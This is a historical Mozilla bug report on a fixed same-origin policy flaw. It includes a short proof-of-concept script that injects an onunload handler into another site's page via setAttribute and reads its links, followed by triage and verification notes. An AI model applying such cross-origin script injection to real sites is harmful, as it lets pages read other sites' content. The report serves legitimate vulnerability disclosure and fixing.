Closed Bug 15757 Opened 25 years ago Closed 25 years ago

[DOGFOOD] Injecting JS code using setAttribute and getElementsByTagName

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

()

Details

(Whiteboard: [PDT+])

It is possible to include JavaScript code in any HTML page using setAttribute and getElementsByTagName. This exposes the whole DOM of the target document, including content, input fields, links, etc. I use the "onunload" body event, but probably there are others ways. The code is: -------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com"); setTimeout("r=a.document.getElementsByTagName('BODY')[0];r.setAttribute('onunloa d','s=\"Here are some links: \"; for(i=0;i< ( (document.links.length < 10) ? document.links.length : 10) ;i++) s += document.links[i].href +String.fromCharCode(10);alert(s)')",10000); </SCRIPT> --------------------------------------
Status: NEW → ASSIGNED
Blocks: 16654
No longer blocks: 16654
Target Milestone: M12
Summary: Injecting JS code using setAttribute and getElementsByTagName → [Dogfood] Injecting JS code using setAttribute and getElementsByTagName
Marking dogfood for analysis by PDT at jar's request.
Summary: [Dogfood] Injecting JS code using setAttribute and getElementsByTagName → [DOGFOOD] Injecting JS code using setAttribute and getElementsByTagName
Very ingenious. I think setAttribute should be subject to the same origin policy check.
Whiteboard: [PDT+]
Putting on PDT+ radar.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Windows NT (1999112908) Com: Javascript Error: uncaught exception: [Exception... "Security error" code: "1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location: "http://www.nat.bg/~joro/mozilla/createel.html Line: 16"]
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.